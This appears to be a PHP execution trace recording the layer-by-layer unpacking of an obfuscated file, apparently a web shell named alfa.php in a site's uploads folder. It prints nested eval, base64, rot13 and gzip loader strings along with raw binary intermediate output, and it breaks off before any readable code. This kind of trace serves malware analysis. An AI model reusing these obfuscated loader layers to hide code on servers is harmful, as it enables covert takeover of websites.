10	41	0	0.012597	2392656	eval	1	'eval(gzuncompress(base64_decode(str_rot13(\'rWjAl7rlb0tNDAUCzoqSDBZR1ALTrPhRS5OZAqQPPPCu4ri33rOxS22j+6zhqFwT/wBurs6My+aiAP4R9MCQTq3bilHdkuY9/VUZ7tPaQ1NpPLVwh2gW1KgREdhfhA16AdjLzA3rf8MXOPoO4IaY1w4EnAiaD+i0DiMBFMRfrlX4GBlPaqLKagw20qlayjyeFxNywe8oLDk5ly3xcsRTzmjyiUjY1gForbCiboYmXBbPdY9tlXm64kzpHgzYjjsGlpAut6cuY8HKaMQA09rrxbZFj95Ly67yBBPU2I1yclT5I8LXGW5ki5LAS2ghmeoIxbhpsAmX5eX+tJmPEzkXniDWmY16Xdqo4RLTpPOVtoJACM3zA5JkGMMdufmyKK6MknaoFD4iescOAIlJe2ID6o4vi1Vcxry10Qd7vQ0vLwsfF8GhaSWShOWWYTgctQIvVG2tG9hqsATyo+jrXWIZkt7aya8vay2Z0eAoLwG0vrGu/QLDWhXmfc9UircIJFpdhw5Fz3aswLmRcxLLA1OrYQU6uHp24roc7rSZDzOouxLFTO3cQkbpZssMvXuZLoZe1zkEWUkuqtv69bcJEJlIIm9lK/Ycu1HHSrN4IopLvAGEsDxP432KbLNEfBjIbK0gFQ3bXDkA8ZumUscH5vjh6wBcfMQow0xQoWJJuRbnFjW8K3LRJuUnJf5Nduts5/I79gXisGBSkotb7/sxAZw0SNMdbNn3SvboN8IXnJ53HQnQjRslXVy5VylrKPEm+Pcp0GDl3ozrneiTrclOvyP5fm/1Do7OxAtLUwRDPpucYxPssPDMkcc5pSpDivgBlk5JSY+oGEZ+tOdtmTJMvZpnj3MTQw0nEbI1URyB56huIbFN07tvs9vp+Uc9UGfXAZq07xFBY7+RiBTK47IIvTd7N0iJITmhU1RApsgFU4Dkgh/o/FTZgOgWeaIKvjzn+MXdvQEFl8sk4pOsBZ7Y1AvbhiYsa39++/q/sif1Nt==\'))));'	/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	0
11	42	0	0.012630	2392656	str_rot13	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'rWjAl7rlb0tNDAUCzoqSDBZR1ALTrPhRS5OZAqQPPPCu4ri33rOxS22j+6zhqFwT/wBurs6My+aiAP4R9MCQTq3bilHdkuY9/VUZ7tPaQ1NpPLVwh2gW1KgREdhfhA16AdjLzA3rf8MXOPoO4IaY1w4EnAiaD+i0DiMBFMRfrlX4GBlPaqLKagw20qlayjyeFxNywe8oLDk5ly3xcsRTzmjyiUjY1gForbCiboYmXBbPdY9tlXm64kzpHgzYjjsGlpAut6cuY8HKaMQA09rrxbZFj95Ly67yBBPU2I1yclT5I8LXGW5ki5LAS2ghmeoIxbhpsAmX5eX+tJmPEzkXniDWmY16Xdqo4RLTpPOVtoJACM3zA5JkGMMdufmyKK6MknaoFD4iescOAIlJe2ID6o4vi1Vcxry10Qd7vQ0vLwsfF8GhaSWShOWWYTgctQIvVG2tG9hqsATyo+jrXWIZkt7aya8vay2Z0eAoLwG0vrGu/QLDWhXmfc9UircIJFpd'
11	42	1	0.012656	2393968
11	42	R			'eJwNy7eyo0gAQNHPmbdFQOME1NYGeCuEF5BMNdDCCCPh4ev33eBkF22w+6mudSjG/jOhef6Zl+nvNC4E9ZPDGd3ovyUqxhL9/IHM7gCnD1AcCYIju2tJ1XtERqusuN16NqwYmN3es8ZKBCbB4VnL1j4RaNvnQ+v0QvZOSZEseyK4TOyCndYXntj20dynlwlrSkAljr8bYQx5yl3kpfEGmzwlvHwL1tSbeoPvobLzKOoCqL9gyKz64xmcUtmLwwfTycNhg6phL8UXnZDN09eekoMSw95Yl67lOOCH2V1lpyG5V8YKTJ5xv5YNF2tuzrbVkoucfNzK5rK+gWzCRmxKavQJzL16Kqdb4EYGcCBIgbWNPZ3mN5WxTZZqhszlXX6ZxanbSQ4vrfpBNVyWr2VQ6b4iv1Ipkel10Dq7iD0iYjfsS8TunFJFuBJJLGtpgDViIT2gT9udfNGlb+weKJVMxg7nln8inl2M0rNbYjT0ieTh/DYQJuKzsp9HvepVWScq'
11	43	0	0.012682	2393936	base64_decode	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'eJwNy7eyo0gAQNHPmbdFQOME1NYGeCuEF5BMNdDCCCPh4ev33eBkF22w+6mudSjG/jOhef6Zl+nvNC4E9ZPDGd3ovyUqxhL9/IHM7gCnD1AcCYIju2tJ1XtERqusuN16NqwYmN3es8ZKBCbB4VnL1j4RaNvnQ+v0QvZOSZEseyK4TOyCndYXntj20dynlwlrSkAljr8bYQx5yl3kpfEGmzwlvHwL1tSbeoPvobLzKOoCqL9gyKz64xmcUtmLwwfTycNhg6phL8UXnZDN09eekoMSw95Yl67lOOCH2V1lpyG5V8YKTJ5xv5YNF2tuzrbVkoucfNzK5rK+gWzCRmxKavQJzL16Kqdb4EYGcCBIgbWNPZ3mN5WxTZZqhszlXX6ZxanbSQ4vrfpBNVyWr2VQ6b4iv1Ipkel10Dq7iD0iYjfsS8TunFJFuBJJLGtpgDViIT2gT9udfNGlb+weKJVMxg7nln8inl2M0rNbYjT0ieTh/DYQJuKzsp9HvepVWScq'
11	43	1	0.012709	2395248
11	43	R			'x�\r˷��H\000@�ϙ�E@�\004��\006x+�\027�L5��\b#�����d\027m����u(�3�y�����4.\004���\031��%*�\022�����\000�\017P\034\t�#�kI�{DF����z6�\030��޳�J\004&��Y��>\021h��C��B�NI�,{"�L삝�\027���ܧ�\tkJ@%��\033a\fy�]��\006�<%�|\v�ԛz��(�\002��`Ȭ��\031�Rً�\a���a��a/�\027����מ��\022��X���8��]e�!�W�\nL�q��\r\027knζՒ��|��沾�l�FlJj�\t̽z*�[�F\006p H���=��7��M�j���]~�ũ�I\016/��A5\\��eP�"�R)��u�:��="b7�K��RE�\022I,ki�5b!=�O۝|ѥo�\036(�L�\016�"�]�ҳ[b4���6\020&Ⳳ�G��UY\'*�>R�yߍ�ĦF\0307P^,1��G6�����LB`'
11	44	0	0.012768	2393936	gzuncompress	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'x�\r˷��H\000@�ϙ�E@�\004��\006x+�\027�L5��\b#�����d\027m����u(�3�y�����4.\004���\031��%*�\022�����\000�\017P\034\t�#�kI�{DF����z6�\030��޳�J\004&��Y��>\021h��C��B�NI�,{"�L삝�\027���ܧ�\tkJ@%��\033a\fy�]��\006�<%�|\v�ԛz��(�\002��`Ȭ��\031�Rً�\a���a��a/�\027����מ��\022��X���8��]e�!�W�\nL�q��\r\027knζՒ��|��沾�l�FlJj�\t̽z*�[�F\006p H���=��7��M�j���]~�ũ�I\016/��A5\\��eP�"�R)��u�:��="b7�K��RE�\022I,ki�5b!=�O۝|ѥo�\036(�L�\016�"�]�ҳ[b4���6\020&Ⳳ�G��UY\'*�>R�yߍ�ĦF\0307P^,1��G6�����LB`'
11	44	1	0.012833	2394992
11	44	R			'eval(gzuncompress(str_rot13(base64_decode(\'a5wN0NmSeVUAANDPud3hwU2UuDEPluyi7BSJlwm7Iu1SJ18/Zj7hR1SGvpp4H4t2mNd3277yeatr7t+yKqay+vpGPWQZAuY1aEVVqv1InbY8z2zG9I7XWC/dkAKrmJHi/wTEw9eUlSaHfaT5uHOWSyCdmBnp+H2xN7Sgi7zERBNT7bYfwY2nEVamIutlj880RTZMF7rnXMgIu0J95PqKLatKsiyjjGXz2rR/KZsdh60Zr+o+rXhepSJwgWEyPc/IZ0/0ACSKvom4Yb6F5LJ73inZP9P9tsBrlw28/dKhO3i8ZbudSgHREDfYCXD4unGlLcVQ1U7v+q1VPsY3cTu1XVDGYS+iBcCOaR4LlDz4dRIwQ0dEZD+xN6bpU97tIdQLj1oIHr29askIe+B/sEwyxhuHgdhXFezpCjZQqv2UBihe+8n3QVC5Hz/UL1PbY6ONrASLKIG21+4UHO40xV8p'
11	45	0	0.012875	2396056	eval	1	'eval(gzuncompress(str_rot13(base64_decode(\'a5wN0NmSeVUAANDPud3hwU2UuDEPluyi7BSJlwm7Iu1SJ18/Zj7hR1SGvpp4H4t2mNd3277yeatr7t+yKqay+vpGPWQZAuY1aEVVqv1InbY8z2zG9I7XWC/dkAKrmJHi/wTEw9eUlSaHfaT5uHOWSyCdmBnp+H2xN7Sgi7zERBNT7bYfwY2nEVamIutlj880RTZMF7rnXMgIu0J95PqKLatKsiyjjGXz2rR/KZsdh60Zr+o+rXhepSJwgWEyPc/IZ0/0ACSKvom4Yb6F5LJ73inZP9P9tsBrlw28/dKhO3i8ZbudSgHREDfYCXD4unGlLcVQ1U7v+q1VPsY3cTu1XVDGYS+iBcCOaR4LlDz4dRIwQ0dEZD+xN6bpU97tIdQLj1oIHr29askIe+B/sEwyxhuHgdhXFezpCjZQqv2UBihe+8n3QVC5Hz/UL1PbY6ONrASLKIG21+4UHO40xV8pv1UdYaiwEKsK32af+LT0ljzUuEBjEfmo8q2WRTgUUc0xyFPcn1YNHRCa0IkMDaA+1admEAjfteFx4rTTJ0ObbHaR3ZNtPemZCiKePmoXi0LF4CAgCod10qfLU0jBaLGb5a3coOyzTTJmCzTTmirTcotEkkrNieJQE5aG0h06jaEv5aBgEi6M0dinA9UDoCBbXAzQDcXsTfcPBJIZHNzWFjuVHVZ0g1F8ymyHnD6aT1v59e5aeAeNiz04y9UCIIuZQawEe/wENj7xKUVkivGAp03naD8ZZB/VG57lIbaQ4aUcKxxXb4buIFg1A/4/EDp7b1qQmhVNEaJoYslB89dq1Dv/zNQjgTehLl0tZig7bRxUha/LzFO1Iojk6MOAo4PUCPKMFcraJbtYFe2IYKR//nx/f//9D3oiFHE=\'))));'	/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	0
12	46	0	0.012908	2396056	base64_decode	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'a5wN0NmSeVUAANDPud3hwU2UuDEPluyi7BSJlwm7Iu1SJ18/Zj7hR1SGvpp4H4t2mNd3277yeatr7t+yKqay+vpGPWQZAuY1aEVVqv1InbY8z2zG9I7XWC/dkAKrmJHi/wTEw9eUlSaHfaT5uHOWSyCdmBnp+H2xN7Sgi7zERBNT7bYfwY2nEVamIutlj880RTZMF7rnXMgIu0J95PqKLatKsiyjjGXz2rR/KZsdh60Zr+o+rXhepSJwgWEyPc/IZ0/0ACSKvom4Yb6F5LJ73inZP9P9tsBrlw28/dKhO3i8ZbudSgHREDfYCXD4unGlLcVQ1U7v+q1VPsY3cTu1XVDGYS+iBcCOaR4LlDz4dRIwQ0dEZD+xN6bpU97tIdQLj1oIHr29askIe+B/sEwyxhuHgdhXFezpCjZQqv2UBihe+8n3QVC5Hz/UL1PbY6ONrASLKIG21+4UHO40xV8pv1UdYaiwEKsK32af+LT0ljzUuEBjEfmo8q2WRTgUUc0x'
12	46	1	0.012936	2397112
12	46	R			'k�\r�ْyU\000\000�Ϲ��M��1\017���\024��\t�"�R\'_?f>�GT���x\037�v��w۾�y�k�߲*����F=d\031\002�5hEU��H��<�l���X/ݐ\002����\004��ה�&�}���s�K ��\031�}�7�����D\023S�\037���\021V�"�e��4E6L\027��\\�\b�B}�-�J�,��e�ڴ)�\035��\031��>�x^�"p�a2=��gO�\000$����a���{�)�?���k�\r��ҡ;x�e��J\001�\0207�\tp��q�-�P�N�U>�7q;�]P�a/�\005��i\036\v�<�u\0220CGDd?�7��S��!�\v�Z\b\036��j�\b{��L2�\033���W\025��\n6P���\006(^��AP�\037?�/S�c���\004�(����\024\034�4�_)�U\035a��\020�\n�f����<Ը@c\021���E8\024Q�1�SܟV\r\035\0'
12	47	0	0.012992	2397080	str_rot13	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'k�\r�ْyU\000\000�Ϲ��M��1\017���\024��\t�"�R\'_?f>�GT���x\037�v��w۾�y�k�߲*����F=d\031\002�5hEU��H��<�l���X/ݐ\002����\004��ה�&�}���s�K ��\031�}�7�����D\023S�\037���\021V�"�e��4E6L\027��\\�\b�B}�-�J�,��e�ڴ)�\035��\031��>�x^�"p�a2=��gO�\000$����a���{�)�?���k�\r��ҡ;x�e��J\001�\0207�\tp��q�-�P�N�U>�7q;�]P�a/�\005��i\036\v�<�u\0220CGDd?�7��S��!�\v�Z\b\036��j�\b{��L2�\033���W\025��\n6P���\006(^��AP�\037?�/S�c���\004�(����\024\034�4�_)�U\035a��\020�\n�f����<Ը@c\021���E8\024Q�1�SܟV\r\035\0'
12	47	1	0.013045	2397880
12	47	R			'x�\r�ْlH\000\000�Ϲ��Z��1\017���\024��\t�"�E\'_?s>�TG���k\037�i��j۾�l�x�߲*����S=q\031\002�5uRH��U��<�y���K/ݐ\002����\004��ה�&�}���f�X ��\031�}�7�����Q\023F�\037���\021I�"�r��4R6Y\027��\\�\b�O}�-�W�,��r�ڴ)�\035��\031��>�k^�"c�n2=��tB�\000$����n���{�)�?���x�\r��ҡ;k�r��W\001�\0207�\tc��d�-�C�A�H>�7d;�]C�n/�\005��v\036\v�<�h\0220PTQq?�7��F��!�\v�M\b\036��w�\b{��Y2�\033���J\025��\n6C���\006(^��NC�\037?�/F�p���\004�(����\024\034�4�_)�H\035n��\020�\n�s����<Ը@p\021���R8\024D�1�FܟI\r\035\0'
12	48	0	0.013100	2396824	gzuncompress	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'x�\r�ْlH\000\000�Ϲ��Z��1\017���\024��\t�"�E\'_?s>�TG���k\037�i��j۾�l�x�߲*����S=q\031\002�5uRH��U��<�y���K/ݐ\002����\004��ה�&�}���f�X ��\031�}�7�����Q\023F�\037���\021I�"�r��4R6Y\027��\\�\b�O}�-�W�,��r�ڴ)�\035��\031��>�k^�"c�n2=��tB�\000$����n���{�)�?���x�\r��ҡ;k�r��W\001�\0207�\tc��d�-�C�A�H>�7d;�]C�n/�\005��v\036\v�<�h\0220PTQq?�7��F��!�\v�M\b\036��w�\b{��Y2�\033���J\025��\n6C���\006(^��NC�\037?�/F�p���\004�(����\024\034�4�_)�H\035n��\020�\n�s����<Ը@p\021���R8\024D�1�FܟI\r\035\0'
12	48	1	0.013160	2397752
12	48	R			'eval(gzuncompress(base64_decode(\'eJxdUE2TojAU/DkzeyNBppba2kOQkATIKASMcplCRFS+GRHCr1/mun16Xf2qX7/OX2n1Xiz35lqlz/z9nH7nH5uvS561l//Z93P4Gton0N/fcIQOzlKUjtfvbIrxMMkCaaa0KdsQhZkTCsNXUhLXrDuorrbeZ92MEjoLQQKaI+9QEW+ckgV4jp5U/quQQyANFo85qWXuBKxsw1UPpH6C55yzcWlmXgxOUXWTzBChd9vDIEkPRh9/GniW3jDhrU2Nhz+hEENVu6x70BmRlo7xECD9CPtXQnZZs/8NmUIcQ3Y+6liQid27uSRtxLd2KixUS9hAeWk1eWgmZHFdKEcTuy6kOg0PtRUIz2HsxgHn3AWcVYWNQhu0Wm8106zZ6qAjxg0Uc9eex8bR+th1sYGDXclWq96VeRMh0C4lSVgvmBKXkyYfWOEULWOVKHElkZIoym7+RPNWoLxZjIoEfLbdM/jJ0TJ1p0'
12	49	0	0.013202	2399072	eval	1	'eval(gzuncompress(base64_decode(\'eJxdUE2TojAU/DkzeyNBppba2kOQkATIKASMcplCRFS+GRHCr1/mun16Xf2qX7/OX2n1Xiz35lqlz/z9nH7nH5uvS561l//Z93P4Gton0N/fcIQOzlKUjtfvbIrxMMkCaaa0KdsQhZkTCsNXUhLXrDuorrbeZ92MEjoLQQKaI+9QEW+ckgV4jp5U/quQQyANFo85qWXuBKxsw1UPpH6C55yzcWlmXgxOUXWTzBChd9vDIEkPRh9/GniW3jDhrU2Nhz+hEENVu6x70BmRlo7xECD9CPtXQnZZs/8NmUIcQ3Y+6liQid27uSRtxLd2KixUS9hAeWk1eWgmZHFdKEcTuy6kOg0PtRUIz2HsxgHn3AWcVYWNQhu0Wm8106zZ6qAjxg0Uc9eex8bR+th1sYGDXclWq96VeRMh0C4lSVgvmBKXkyYfWOEULWOVKHElkZIoym7+RPNWoLxZjIoEfLbdM/jJ0TJ1p0SV61yuPx9JCK4WE+cO+gZJP3Vec4jXPabhBglatrMB25SHLMoeLP3cnABrHOVXvH7qg0IO1ZXWRAbEc2Y4UXlnkZm0kEEClN9qKEjmcpPM8tWEALSv4shcu0avYjNEY9JBbjlOkVoUNCwQ8ghNSgPxQWpBeqEW3x2j9e7NntSNxyxy90XZxxmxofI6IRYnxkVfsxpBmXMlKQZ437vCYLUPmBAf2EOVK7jNo3LEZLelrll1IQqayLwROD86JaDvYW57fdPHaO0NVGvvexzzLanDe++YvkUS41SZKSba37dfP/jzD9NV+2A=\')));'	/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	0
13	50	0	0.013233	2399072	base64_decode	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'eJxdUE2TojAU/DkzeyNBppba2kOQkATIKASMcplCRFS+GRHCr1/mun16Xf2qX7/OX2n1Xiz35lqlz/z9nH7nH5uvS561l//Z93P4Gton0N/fcIQOzlKUjtfvbIrxMMkCaaa0KdsQhZkTCsNXUhLXrDuorrbeZ92MEjoLQQKaI+9QEW+ckgV4jp5U/quQQyANFo85qWXuBKxsw1UPpH6C55yzcWlmXgxOUXWTzBChd9vDIEkPRh9/GniW3jDhrU2Nhz+hEENVu6x70BmRlo7xECD9CPtXQnZZs/8NmUIcQ3Y+6liQid27uSRtxLd2KixUS9hAeWk1eWgmZHFdKEcTuy6kOg0PtRUIz2HsxgHn3AWcVYWNQhu0Wm8106zZ6qAjxg0Uc9eex8bR+th1sYGDXclWq96VeRMh0C4lSVgvmBKXkyYfWOEULWOVKHElkZIoym7+RPNWoLxZjIoEfLbdM/jJ0TJ1p0SV61yuPx9JCK4WE+cO+gZJP3Vec4jXPabh'
13	50	1	0.013260	2400000
13	50	R			'x�]PM��0\024�93{#A����C��\004�(\004�r�BDT�\031\021¯_�}z]��_��_i�^,��Z����~�\037��K�����s�\032�\'���p�\016�R����l��0�\002i��)�\020��\023\n�WR\022׬;����g݌\022:\vA\002�#�P\021o��\005x��T���C \r\026�9�e�\004�l�U\017�~�眳qif^\fNQu��\020�w�� I\017F\037\032x��0�M��?�\020CU��{�\031����\020 �\b�WBvY��\r�B\034Cv>�X��ݻ�$mķv*,TK�@yi5yh&dq](G\023�.�:\r\017�\025\b�a��\001��\005�U��B\033�Zo5Ӭ��#�\r\024sמ����u���]�V�ޕy\023!�.%IX/�\022��&\037X�\024-c�(q%��(�n�D�V��Y��\004|��3���2u�D��\\�?\037I\b�\026\023�\01'
13	51	0	0.013346	2399968	gzuncompress	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'x�]PM��0\024�93{#A����C��\004�(\004�r�BDT�\031\021¯_�}z]��_��_i�^,��Z����~�\037��K�����s�\032�\'���p�\016�R����l��0�\002i��)�\020��\023\n�WR\022׬;����g݌\022:\vA\002�#�P\021o��\005x��T���C \r\026�9�e�\004�l�U\017�~�眳qif^\fNQu��\020�w�� I\017F\037\032x��0�M��?�\020CU��{�\031����\020 �\b�WBvY��\r�B\034Cv>�X��ݻ�$mķv*,TK�@yi5yh&dq](G\023�.�:\r\017�\025\b�a��\001��\005�U��B\033�Zo5Ӭ��#�\r\024sמ����u���]�V�ޕy\023!�.%IX/�\022��&\037X�\024-c�(q%��(�n�D�V��Y��\004|��3���2u�D��\\�?\037I\b�\026\023�\01'
13	51	1	0.013410	2400896
13	51	R			'eval(gzinflate(base64_decode(base64_decode(str_rot13(\'ETAVFzgkFKqODHEErwWgA09WDHI4GyEIFRS5LyWWGJ9mp2yfD3qcpxAZHxSSGQHeAKVlGKuwZz1KF3ZlLvgWrQW5IUueGmWeFQIkoRuwZQW3Y2beMIuznxMgrFglpwWcAGHiDKE1ZaV5qUN5ExWKrwECDH5jLwARE2ymJIpjHxAGoHuUrQA3X2qvZGOcnP82IyAME2IbX3ESGwIipxkGoTMCDaSBAmW2n2Wdo0WVnwABM3SyF0SOpRH3HRVmBQSKFIIhM1MMMJ1MIlgDARD1o0qBnwx0DyV3AIM5AUMJDxunF0qUJJE5EQOkISyFqJWenTA1ozkGZIqSIySdY0WjEyEaAzulZySfGTyWATchLwHeoSAenz5lGQMxDJb1pRH3oIyiHGykpRHkDH5XGR1fBISbp2L5GaN3MmM2ERH3I0EnASHkox52oaMRITcjIaN4Y1InFyLlM'
13	52	0	0.013450	2402472	eval	1	'eval(gzinflate(base64_decode(base64_decode(str_rot13(\'ETAVFzgkFKqODHEErwWgA09WDHI4GyEIFRS5LyWWGJ9mp2yfD3qcpxAZHxSSGQHeAKVlGKuwZz1KF3ZlLvgWrQW5IUueGmWeFQIkoRuwZQW3Y2beMIuznxMgrFglpwWcAGHiDKE1ZaV5qUN5ExWKrwECDH5jLwARE2ymJIpjHxAGoHuUrQA3X2qvZGOcnP82IyAME2IbX3ESGwIipxkGoTMCDaSBAmW2n2Wdo0WVnwABM3SyF0SOpRH3HRVmBQSKFIIhM1MMMJ1MIlgDARD1o0qBnwx0DyV3AIM5AUMJDxunF0qUJJE5EQOkISyFqJWenTA1ozkGZIqSIySdY0WjEyEaAzulZySfGTyWATchLwHeoSAenz5lGQMxDJb1pRH3oIyiHGykpRHkDH5XGR1fBISbp2L5GaN3MmM2ERH3I0EnASHkox52oaMRITcjIaN4Y1InFyLlMmt3ryAFH3y0nT52Exc5FTkiIT9Zo2I2G1yLo0AQZxk4ZxWvnR11ovgXIJDmAvg4rTuZp2MBFFgaBH1nIQSWX29HHQS6GmSGqSyzLJuTITchDwyhMUITJPgkqUcGD2yKpSSzFUEgqmImA2WeMyWHE1EPqJS5ImL1ISS6EKAlJSMDMTkuEGOCHJ9lpRAQnT9hG2xjpyS2LKEMDKqnqUAWAT1lDxuPEUMCGmRiqF9LBGZ5Yl9aEG0=\')))));'	/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	0
14	53	0	0.013482	2402472	str_rot13	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'ETAVFzgkFKqODHEErwWgA09WDHI4GyEIFRS5LyWWGJ9mp2yfD3qcpxAZHxSSGQHeAKVlGKuwZz1KF3ZlLvgWrQW5IUueGmWeFQIkoRuwZQW3Y2beMIuznxMgrFglpwWcAGHiDKE1ZaV5qUN5ExWKrwECDH5jLwARE2ymJIpjHxAGoHuUrQA3X2qvZGOcnP82IyAME2IbX3ESGwIipxkGoTMCDaSBAmW2n2Wdo0WVnwABM3SyF0SOpRH3HRVmBQSKFIIhM1MMMJ1MIlgDARD1o0qBnwx0DyV3AIM5AUMJDxunF0qUJJE5EQOkISyFqJWenTA1ozkGZIqSIySdY0WjEyEaAzulZySfGTyWATchLwHeoSAenz5lGQMxDJb1pRH3oIyiHGykpRHkDH5XGR1fBISbp2L5GaN3MmM2ERH3I0EnASHkox52oaMRITcjIaN4Y1InFyLlMmt3ryAFH3y0nT52Exc5FTkiIT9Zo2I2G1yLo0AQZxk4ZxWvnR11ovgX'
14	53	1	0.013516	2403272
14	53	R			'RGNISmtxSXdBQURRejJtN09JQUV4TlRVSEF5YlJJTW9zc2lsQ3dpckNMUkFFTDUrNXIyTXhjMm1XS3MyYitJeDJ5VHhrTzJrSDVxbEhjMDJ3L2orZVhmakZteStycjJpNTUvQXR1MnI5dHA5RkJXejRPQU5wYjNER2lzWVcwUkNTbUhHeDN3K2diMTBpaC82VlNZR2VoK3RFTjVvckxTbGZPQnFONzJ2a2Jqb0JIajNOZ3FlS0FBcEU3UEIzODFXSVVuZ1ZZZW1ZVytQNEQ1b0dOajk0QlI3NVZ5NHZWQkhaS0dHWWR5RDBxVFlSdWJraGN1bmxTMVdFVlFqL0JwRlRnNmhyMlFsTGlJNGpuYjUrbFNram5yTDZkQWo1cEU3bVlvUTlxcEUxQU5KTE1sOVFoc2Y5TnA3ZzZ2REU3V0RaNFUxbk52bnZEVGpwVnA4L1VaSlYyZzg3elNSU3l0aG52Rkp5SGxvVG9Mb2V2T1lYb0NDMkx4MkJiaE11bitK'
14	54	0	0.013544	2403240	base64_decode	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'RGNISmtxSXdBQURRejJtN09JQUV4TlRVSEF5YlJJTW9zc2lsQ3dpckNMUkFFTDUrNXIyTXhjMm1XS3MyYitJeDJ5VHhrTzJrSDVxbEhjMDJ3L2orZVhmakZteStycjJpNTUvQXR1MnI5dHA5RkJXejRPQU5wYjNER2lzWVcwUkNTbUhHeDN3K2diMTBpaC82VlNZR2VoK3RFTjVvckxTbGZPQnFONzJ2a2Jqb0JIajNOZ3FlS0FBcEU3UEIzODFXSVVuZ1ZZZW1ZVytQNEQ1b0dOajk0QlI3NVZ5NHZWQkhaS0dHWWR5RDBxVFlSdWJraGN1bmxTMVdFVlFqL0JwRlRnNmhyMlFsTGlJNGpuYjUrbFNram5yTDZkQWo1cEU3bVlvUTlxcEUxQU5KTE1sOVFoc2Y5TnA3ZzZ2REU3V0RaNFUxbk52bnZEVGpwVnA4L1VaSlYyZzg3elNSU3l0aG52Rkp5SGxvVG9Mb2V2T1lYb0NDMkx4MkJiaE11bitK'
14	54	1	0.013571	2404040
14	54	R			'DcHJkqIwAADQz2m7OIAExNTUHAybRIMossilCwirCLRAEL5+5r2Mxc2mWKs2b+Ix2yTxkO2kH5qlHc02w/j+eXfjFmy+rr2i55/Atu2r9tp9FBWz4OANpb3DGisYW0RCSmHGx3w+gb10ih/6VSYGeh+tEN5orLSlfOBqN72vkbjoBHj3NgqeKAApE7PB381WIUngVYemYW+P4D5oGNj94BR75Vy4vVBHZKGGYdyD0qTYRubkhcunlS1WEVQj/BpFTg6hr2QlLiI4jnb5+lSkjnrL6dAj5pE7mYoQ9qpE1ANJLMl9Qhsf9Np7g6vDE7WDZ4U1nNvnvDTjpVp8/UZJV2g87zSRSythnvFJyHloToLoevOYXoCC2Lx2BbhMun+JUd36+xxhLsfNI+g9MZT1I+oTP1zO1StYfahFTjnB9nduFX+qtzSCiWpQfHtmw5s7bkfRTGTBuayW65TQzEsrXVPdlaE0OQorpCChonOi0rQvatYAwZtsI4mrBHBDvOO1'
14	55	0	0.013598	2403240	base64_decode	0		/var/www/html/uploads/alfa.php(11) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	